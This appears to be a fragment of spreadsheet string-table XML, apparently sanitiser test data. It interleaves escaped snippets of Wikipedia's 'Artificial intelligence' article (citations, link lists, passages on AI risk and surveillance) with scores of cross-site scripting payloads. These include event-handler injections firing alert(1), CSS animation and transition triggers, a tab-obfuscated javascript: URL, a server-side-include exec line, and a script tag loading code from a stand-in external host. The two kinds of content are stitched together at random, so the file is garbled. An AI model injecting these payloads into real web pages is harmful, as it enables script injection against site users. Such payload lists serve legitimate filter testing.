title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=The+New+Atlantis&amp;amp;rft.atitle=Artificial+Intelligence+and+Human+Nature&amp;amp;rft.ssn=spring&amp;amp;rft.volume=1&amp;amp;rft.pages=88-100&amp;amp;rft.date=2003&amp;amp;rft.aulast=Rubin&amp;amp;rft.aufirst=Charles&amp;amp;rft_id=http%3A%2F%2Fwww.thenewatlantis.com%2Fpublications%2Fartificial-intelligence-and-human-nature&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;hr oncut="alert(1)" contenteditable&gt;test&lt;/hr&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-83"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-83"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;568–578 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;body onpointerenter=alert(1)&gt;XSS&lt;/body&gt;</t>
  </si>
  <si>
    <t>&lt;listing ondblclick="alert(1)"&gt;test&lt;/listing&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFShapiro1992" class="citation book"&gt;Shapiro, Stuart C. (1992). "Artificial Intelligence".  In Shapiro, Stuart C. (ed.). &lt;a rel="nofollow" class="external text" href="http://www.cse.buffalo.edu/~shapiro/Papers/ai.pdf"&gt;&lt;i&gt;Encyclopedia of Artificial Intelligence &lt;/i&gt; &lt;/a&gt; &lt;span class="cs1-format"&gt;(PDF) </t>
  </si>
  <si>
    <t>&lt;head onbeforecopy="alert(1)" contenteditable&gt;test&lt;/head&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Decision_theory" title="Decision theory"&gt;Decision theory &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;kbd ondragover=alert(1) contenteditable&gt;drop here&lt;/kbd&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=The+Washington+Post&amp;amp;rft.atitle=Bill+Gates+on+dangers+of+artificial+intelligence%3A+%27I+don%27t+understand+why+some+people+are+not+concerned%27&amp;amp;rft.date=2015-01-28&amp;amp;rft.issn=0190-8286&amp;amp;rft.aulast=Holley&amp;amp;rft.aufirst=Peter&amp;amp;rft_id=https%3A%2F%2Fwww.washingtonpost.com%2Fnews%2Fthe-switch%2Fwp%2F2015%2F01%2F28%2Fbill-gates-on-dangers-of-artificial-intelligence-dont-understand-why-some-people-are-not-concerned%2F&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;output onclick="alert(1)"&gt;test&lt;/output&gt;</t>
  </si>
  <si>
    <t>&lt;footer draggable="true" ondrag="alert(1)"&gt;test&lt;/footer&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;b id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/b&gt;</t>
  </si>
  <si>
    <t>&lt;menuitem ondblclick="alert(1)"&gt;test&lt;/menuitem&gt;</t>
  </si>
  <si>
    <t>&lt;multicol onkeyup="alert(1)" contenteditable&gt;test&lt;/multicol&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Ian_Hacking" title="Ian Hacking"&gt;Ian Hacking &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;figcaption onpointerout=alert(1)&gt;XSS&lt;/figcaption&gt;</t>
  </si>
  <si>
    <t>&lt;applet draggable="true" ondrag="alert(1)"&gt;test&lt;/applet&gt;</t>
  </si>
  <si>
    <t>&lt;label id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/label&gt;</t>
  </si>
  <si>
    <t>&lt;aside onkeypress="alert(1)" contenteditable&gt;test&lt;/aside&gt;</t>
  </si>
  <si>
    <t>&lt;link draggable="true" ondragend="alert(1)"&gt;test&lt;/link&gt;</t>
  </si>
  <si>
    <t>&lt;multicol draggable="true" ondrag="alert(1)"&gt;test&lt;/multicol&gt;</t>
  </si>
  <si>
    <t>&lt;hgroup onmouseenter="alert(1)"&gt;test&lt;/hgroup&gt;</t>
  </si>
  <si>
    <t>&lt;!--#exec cmd="/bin/echo 'IPT SRC=http://.rocks/.js&gt;</t>
  </si>
  <si>
    <t>:ex/**//*/*/pression(alert(""))'&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;option id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/option&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Expert_systems-41"&gt;&lt;span class="mw-cite-backlink"&gt;^ &lt;a href="#cite_ref-Expert_systems_41-0"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;a &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; &lt;a href="#cite_ref-Expert_systems_41-1"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;b &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;canvas draggable="true" ondrag="alert(1)"&gt;test&lt;/canvas&gt;</t>
  </si>
  <si>
    <t>&lt;p ondblclick="alert(1)"&gt;test&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;fieldset onmouseup="alert(1)"&gt;test&lt;/fieldset&gt;</t>
  </si>
  <si>
    <t>&lt;wbr id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/wbr&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, p.&amp;#160;758 &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;basefont ondblclick="alert(1)"&gt;test&lt;/basefont&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;optgroup id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/optgroup&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Emotion_and_affective_computing-144"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Emotion_and_affective_computing_144-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Rudolf_Carnap" title="Rudolf Carnap"&gt;Rudolf Carnap &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;small onkeyup="alert(1)" contenteditable&gt;test&lt;/small&gt;</t>
  </si>
  <si>
    <t>&lt;label oncopy="alert(1)" contenteditable&gt;test&lt;/label&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation news"&gt;&lt;a rel="nofollow" class="external text" href="https://www.scientificamerican.com/article/what-is-fuzzy-logic-are-t/"&gt;"What is 'fuzzy logic'? Are there computers that are inherently fuzzy and do not apply the usual binary logic?" &lt;/a&gt;. &lt;i&gt;Scientific American &lt;/i&gt;&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;5 May </t>
  </si>
  <si>
    <t>&lt;object onbeforepaste="alert(1)" contenteditable&gt;test&lt;/object&gt;</t>
  </si>
  <si>
    <t>&lt;noembed onbeforecut="alert(1)" contenteditable&gt;test&lt;/noembed&gt;</t>
  </si>
  <si>
    <t>&lt;samp id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/samp&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;menuitem style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/menuitem&gt;</t>
  </si>
  <si>
    <t>&lt;dfn onmouseover="alert(1)"&gt;test&lt;/dfn&gt;</t>
  </si>
  <si>
    <t>&lt;th onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/th&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;For the danger of uncontrolled advanced AI to be realized, the hypothetical AI would have to overpower or out-think all of humanity, which a minority of experts argue is a possibility far enough in the future to not be worth researching.&lt;sup id="cite_ref-377" class="reference"&gt;&lt;a href="#cite_note-377"&gt;&amp;#91;366&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-378" class="reference"&gt;&lt;a href="#cite_note-378"&gt;&amp;#91;367&amp;#93; &lt;/a&gt; &lt;/sup&gt; Other counterarguments revolve around humans being either intrinsically or convergently valuable from the perspective of an artificial intelligence.&lt;sup id="cite_ref-379" class="reference"&gt;&lt;a href="#cite_note-379"&gt;&amp;#91;368&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;div role="navigation" class="navbox" aria-labelledby="Emerging_technologies_in_information_and_communications" style="padding:3px"&gt;&lt;table class="nowraplinks hlist mw-collapsible autocollapse navbox-inner" style="border-spacing:0;background:transparent;color:inherit"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;th scope="col" class="navbox-title" colspan="2" style="text-align: center;"&gt;</t>
  </si>
  <si>
    <t>&lt;b id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/b&gt;</t>
  </si>
  <si>
    <t>&lt;multicol oncopy="alert(1)" contenteditable&gt;test&lt;/multicol&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Confirmation_holism" title="Confirmation holism"&gt;Confirmation holism &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/William_Whewell" title="William Whewell"&gt;William Whewell &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Niklas_Luhmann" title="Niklas Luhmann"&gt;Niklas Luhmann &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;sub onmousedown="alert(1)"&gt;test&lt;/sub&gt;</t>
  </si>
  <si>
    <t>&lt;h1 onpointerleave=alert(1)&gt;XSS&lt;/h1&gt;</t>
  </si>
  <si>
    <t>&lt;hr draggable="true" ondragstart="alert(1)"&gt;test&lt;/hr&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Second-order_cybernetics" title="Second-order cybernetics"&gt;Second-order cybernetics &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Marian_Mazur" title="Marian Mazur"&gt;Marian Mazur &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC="jav	ascript:alert('');"&gt;</t>
  </si>
  <si>
    <t>&lt;bgsound onkeyup="alert(1)" contenteditable&gt;test&lt;/bgsound&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;bdi ondragover=alert(1) contenteditable&gt;drop here&lt;/bdi&gt;</t>
  </si>
  <si>
    <t>&lt;figcaption draggable="true" ondragleave="alert(1)"&gt;test&lt;/figcaption&gt;</t>
  </si>
  <si>
    <t>&lt;main onclick="alert(1)"&gt;test&lt;/main&gt;</t>
  </si>
  <si>
    <t>&lt;mark onkeyup="alert(1)" contenteditable&gt;test&lt;/mark&gt;</t>
  </si>
  <si>
    <t>&lt;figcaption onmouseleave="alert(1)"&gt;test&lt;/figcaption&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Science&amp;amp;rft.atitle=What+can+machine+learning+do%3F+Workforce+implications&amp;amp;rft.pages=1530-1534&amp;amp;rft.date=2017-12-22&amp;amp;rft_id=info%3Adoi%2F10.1126%2Fscience.aap8062&amp;amp;rft_id=info%3Abibcode%2F2017Sci...358.1530B&amp;amp;rft.aulast=Brynjolfsson&amp;amp;rft.aufirst=Erik&amp;amp;rft.au=Mitchell%2C+Tom&amp;amp;rft_id=http%3A%2F%2Fscience.sciencemag.org%2Fcontent%2F358%2F6370%2F1530&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;element onload=alert(1)&gt;&lt;/element&gt;</t>
  </si>
  <si>
    <t>&lt;SCRIPT/ SRC="http://.rocks/.js"&gt;&lt;/SCRIPT&gt;</t>
  </si>
  <si>
    <t>&lt;thead onpaste="alert(1)" contenteditable&gt;test&lt;/thead&gt;</t>
  </si>
  <si>
    <t>&lt;legend oncut="alert(1)" contenteditable&gt;test&lt;/legend&gt;</t>
  </si>
  <si>
    <t>&lt;wbr onpointerout=alert(1)&gt;XSS&lt;/wbr&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;canvas id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/canvas&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;sub id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/sub&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">		&lt;a href="#cite_note-FOOTNOTEEdelson1991-141"&gt;&amp;#91;138&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Glossary_of_medicine" title="Glossary of medicine"&gt;Medicine &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;legend onpointerdown=alert(1)&gt;XSS&lt;/legend&gt;</t>
  </si>
  <si>
    <t>&lt;strike onpointerenter=alert(1)&gt;XSS&lt;/strike&gt;</t>
  </si>
  <si>
    <t>&lt;tfoot onmouseleave="alert(1)"&gt;test&lt;/tfoot&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;a href="#CITEREFTecuci2012"&gt;Tecuci 2012 &lt;/a&gt;. </t>
  </si>
  <si>
    <t>&lt;frameset onmouseenter="alert(1)"&gt;test&lt;/frameset&gt;</t>
  </si>
  <si>
    <t>&lt;menu onpointerdown=alert(1)&gt;XSS&lt;/menu&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;Artificial intelligence in government consists of applications and regulation. Artificial intelligence paired with &lt;a href="/wiki/Facial_recognition_system" title="Facial recognition system"&gt;facial recognition systems &lt;/a&gt; may be used for mass surveillance. This is already the case in some parts of China.&lt;sup id="cite_ref-325" class="reference"&gt;&lt;a href="#cite_note-325"&gt;&amp;#91;314&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-326" class="reference"&gt;&lt;a href="#cite_note-326"&gt;&amp;#91;315&amp;#93; &lt;/a&gt; &lt;/sup&gt; An artificial intelligence has also competed in the Tama City &lt;a href="/wiki/AI_mayor" class="mw-redirect" title="AI mayor"&gt;mayoral elections &lt;/a&gt; in 2018.</t>
  </si>
  <si>
    <t>&lt;table class="box-More_citations_needed_section plainlinks metadata ambox ambox-content ambox-Refimprove" role="presentation"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="mbox-image"&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	&lt;div id="p-logo" role="banner"&gt;</t>
  </si>
  <si>
    <t>&lt;abbr onmouseover="alert(1)"&gt;test&lt;/abbr&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Ludwig_von_Bertalanffy" title="Ludwig von Bertalanffy"&gt;Ludwig von Bertalanffy &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFACM1998"&gt;ACM 1998 &lt;/a&gt;, I.2.4, &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;nextid draggable="true" ondragend="alert(1)"&gt;test&lt;/nextid&gt;</t>
  </si>
  <si>
    <t>&lt;td onpointerleave=alert(1)&gt;XSS&lt;/td&gt;</t>
  </si>
  <si>
    <t>&lt;a onpointermove=alert(1)&gt;XSS&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;nav draggable="true" ondragleave="alert(1)"&gt;test&lt;/nav&gt;</t>
  </si>
  <si>
    <t>&lt;input type=radio id=x onfocus=alert(1)&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Roman_Yampolskiy" title="Roman Yampolskiy"&gt;Roman Yampolskiy &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;html onpointermove=alert(1)&gt;XSS&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Albert_Einstein" title="Albert Einstein"&gt;Albert Einstein &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;map id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/map&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Weizenbaum (the AI researcher who developed the first &lt;a href="/wiki/Chatterbot" class="mw-redirect" title="Chatterbot"&gt;chatterbot &lt;/a&gt; program, &lt;a href="/wiki/ELIZA" title="ELIZA"&gt;ELIZA &lt;/a&gt;) argued in 1976 that the misuse of artificial intelligence has the potential to devalue human life. </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;cite style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/cite&gt;</t>
  </si>
  <si>
    <t>&lt;span onmouseout="alert(1)"&gt;test&lt;/span&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;applet ondrop=alert(1) contenteditable&gt;drop here&lt;/applet&gt;</t>
  </si>
  <si>
    <t>&lt;big onpointerup=alert(1)&gt;XSS&lt;/big&gt;</t>
  </si>
  <si>
    <t>&lt;menu draggable="true" ondragstart="alert(1)"&gt;test&lt;/menu&gt;</t>
  </si>
  <si>
    <t>&lt;span onbeforecut="alert(1)" contenteditable&gt;test&lt;/span&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;i id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/i&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;acronym id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/acronym&gt;</t>
  </si>
  <si>
    <t>&lt;legend onkeypress="alert(1)" contenteditable&gt;test&lt;/legend&gt;</t>
  </si>
  <si>
    <t>&lt;big onmouseout="alert(1)"&gt;test&lt;/big&gt;</t>
  </si>
  <si>
    <t>&lt;font onpointerdown=alert(1)&gt;XSS&lt;/font&gt;</t>
  </si>
  <si>
    <t>&lt;set onpointermove=alert(1)&gt;XSS&lt;/set&gt;</t>
  </si>
  <si>
    <t>&lt;tt onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/tt&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;dl id=x tabindex=1 onfocus=alert(1)&gt;&lt;/dl&gt;</t>
  </si>
  <si>
    <t>&lt;object onmouseover="alert(1)"&gt;test&lt;/object&gt;</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/Feedforward_neural_network" title="Feedforward neural network"&gt;Feedforward neural networks &lt;/a&gt;, &lt;a href="/wiki/Perceptron" title="Perceptron"&gt;perceptrons &lt;/a&gt; and &lt;a href="/wiki/Radial_basis_network" class="mw-redirect" title="Radial basis network"&gt;radial basis networks &lt;/a&gt;:</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Celli_et_al._2017-342"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Celli_et_al._2017_342-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;object onmouseout="alert(1)"&gt;test&lt;/object&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;data id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/data&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;a href="#CITEREFDomingos2015"&gt;Domingos 2015 &lt;/a&gt;, p.&amp;#160;286. </t>
  </si>
  <si>
    <t>&lt;hgroup onpointerover=alert(1)&gt;XSS&lt;/hgroup&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;pre ondrop=alert(1) contenteditable&gt;drop here&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;colgroup onclick="alert(1)"&gt;test&lt;/colgroup&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=45" title="Edit section: Audit"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t>&lt;div onpointerdown=alert(1)&gt;XSS&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Differential_evolution" title="Differential evolution"&gt;Differential evolution &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;strike onpointerleave=alert(1)&gt;XSS&lt;/strike&gt;</t>
  </si>
  <si>
    <t>&lt;embed onmousemove="alert(1)"&gt;test&lt;/embed&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;section style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/section&gt;</t>
  </si>
  <si>
    <t>&lt;element onmousedown="alert(1)"&gt;test&lt;/element&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=unknown&amp;amp;rft.jtitle=CNBC&amp;amp;rft.atitle=A+Californian+business+is+using+A.I.+to+change+the+way+we+think+about+energy+storage&amp;amp;rft.date=2019-06-14&amp;amp;rft.aulast=Frangoul&amp;amp;rft.aufirst=Anmar&amp;amp;rft_id=https%3A%2F%2Fwww.cnbc.com%2F2019%2F06%2F14%2Fthe-business-using-ai-to-change-how-we-think-about-energy-storage.html&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;cite onpointerup=alert(1)&gt;XSS&lt;/cite&gt;</t>
  </si>
  <si>
    <t>&lt;nav draggable="true" ondrag="alert(1)"&gt;test&lt;/nav&gt;</t>
  </si>
  <si>
    <t>&lt;dd&gt;Researchers have designed systems to build intelligent systems out of interacting &lt;a href="/wiki/Intelligent_agent" title="Intelligent agent"&gt;intelligent agents &lt;/a&gt; in a &lt;a href="/wiki/Multi-agent_system" title="Multi-agent system"&gt;multi-agent system &lt;/a&gt;.&lt;sup id="cite_ref-Agent_architectures_180-0" class="reference"&gt;&lt;a href="#cite_note-Agent_architectures-180"&gt;&amp;#91;176&amp;#93; &lt;/a&gt; &lt;/sup&gt; A &lt;a href="/wiki/Hierarchical_control_system" title="Hierarchical control system"&gt;hierarchical control system &lt;/a&gt; provides a bridge between sub-symbolic AI at its lowest, reactive levels and traditional symbolic AI at its highest levels, where relaxed time constraints permit planning and world modeling.&lt;sup id="cite_ref-Hierarchical_control_system_181-0" class="reference"&gt;&lt;a href="#cite_note-Hierarchical_control_system-181"&gt;&amp;#91;177&amp;#93; &lt;/a&gt; &lt;/sup&gt; Some cognitive architectures are custom-built to solve a narrow problem; others, such as &lt;a href="/wiki/Soar_(cognitive_architecture)" title="Soar (cognitive architecture)"&gt;Soar &lt;/a&gt;, are designed to mimic human cognition and to provide insight into general intelligence. Modern extensions of Soar are &lt;a href="/wiki/Hybrid_intelligent_system" title="Hybrid intelligent system"&gt;hybrid intelligent systems &lt;/a&gt; that include both symbolic and sub-symbolic components.&lt;sup id="cite_ref-182" class="reference"&gt;&lt;a href="#cite_note-182"&gt;&amp;#91;178&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-183" class="reference"&gt;&lt;a href="#cite_note-183"&gt;&amp;#91;179&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-184" class="reference"&gt;&lt;a href="#cite_note-184"&gt;&amp;#91;180&amp;#93; &lt;/a&gt; &lt;/sup&gt; &lt;/dd&gt; &lt;/dl&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt;O'Neill, Eleanor (31 July 2016). &lt;a rel="nofollow" class="external text" href="https://www.icas.com/ca-today-news/how-accountancy-and-finance-are-using-artificial-intelligence"&gt;"Accounting, automation and AI" &lt;/a&gt;. &lt;i&gt;icas.com &lt;/i&gt;. &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20161118165901/https://www.icas.com/ca-today-news/how-accountancy-and-finance-are-using-artificial-intelligence"&gt;Archived &lt;/a&gt; from the original on 18 November 2016&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;18 November </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;a href="#CITEREFDomingos2015"&gt;Domingos 2015 &lt;/a&gt;. </t>
  </si>
  <si>
    <t>&lt;keygen oncopy="alert(1)" contenteditable&gt;test&lt;/keygen&gt;</t>
  </si>
  <si>
    <t>&lt;button onpointerenter=alert(1)&gt;XSS&lt;/button&gt;</t>
  </si>
  <si>
    <t>&lt;s onbeforepaste="alert(1)" contenteditable&gt;test&lt;/s&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation journal"&gt;Scassellati, Brian (2002). "Theory of mind for a humanoid robot". &lt;i&gt;Autonomous Robots &lt;/i&gt;. &lt;b&gt;12 &lt;/b&gt; (1): 13–24. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1023%2FA%3A1013298507114"&gt;10.1023/A:1013298507114 &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Autonomous+Robots&amp;amp;rft.atitle=Theory+of+mind+for+a+humanoid+robot&amp;amp;rft.volume=12&amp;amp;rft.issue=1&amp;amp;rft.pages=13-24&amp;amp;rft.date=2002&amp;amp;rft_id=info%3Adoi%2F10.1023%2FA%3A1013298507114&amp;amp;rft.aulast=Scassellati&amp;amp;rft.aufirst=Brian&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;div role="note" class="hatnote navigation-not-searchable"&gt;Main article: &lt;a href="/wiki/Artificial_intelligence_in_government" title="Artificial intelligence in government"&gt;Artificial intelligence in government &lt;/a&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;em onload=alert(1)&gt;&lt;/em&gt;</t>
  </si>
  <si>
    <t>&lt;small onbeforecopy="alert(1)" contenteditable&gt;test&lt;/small&gt;</t>
  </si>
  <si>
    <t>&lt;element draggable="true" ondrag="alert(1)"&gt;test&lt;/element&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;ol id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/ol&gt;</t>
  </si>
  <si>
    <t>&lt;style onclick="alert(1)"&gt;test&lt;/style&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;This is based on &lt;a href="/wiki/Mary%27s_Room" class="mw-redirect" title="Mary&amp;#39;s Room"&gt;Mary's Room &lt;/a&gt;, a thought experiment first proposed by &lt;a href="/wiki/Frank_Cameron_Jackson" title="Frank Cameron Jackson"&gt;Frank Jackson &lt;/a&gt; in 1982 </t>
  </si>
  <si>
    <t>&lt;video onkeypress="alert(1)" contenteditable&gt;test&lt;/video&gt;</t>
  </si>
  <si>
